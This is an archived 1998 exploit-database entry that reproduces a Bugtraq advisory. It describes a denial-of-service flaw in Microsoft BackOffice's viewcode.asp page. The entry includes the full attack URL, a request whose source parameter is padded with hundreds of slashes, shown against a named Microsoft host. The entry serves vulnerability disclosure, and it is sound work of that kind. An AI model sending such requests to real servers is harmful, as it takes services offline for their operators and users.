DOS attack on backoffice viewcode.asp
| Description: | You can leave a host running backoffice in a state of not accepting connections by using http://server.com/whetever/viewcode.asp?source=/////////////////<lots more slashes>/// |
| Author: | Anonymous |
| Compromise: | DOS attack against web server |
| Vulnerable Systems: | Those running Microsoft Backoffice with viewcode.asp available |
| Date: | 14 January 1998 |
Date: Wed, 14 Jan 1998 18:50:25 -0600
From: Aleph One <aleph1@DFW.DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: MS BackOffice View Source
>From an anonymous contributor:
On a Microsoft Backorifice server you often get the
"View source" - eg on www.backoffice.microsoft.com
Unfortunately it appears there are problems with it. Querying
http://www.backoffice.microsoft.com/general/code/viewcode.asp?source=//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
leaves the host in question not accepting connections. Does anyone know if
this is a generic bug in backorifice or purely a fun feature of microsoft.com
[Anonymous]
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
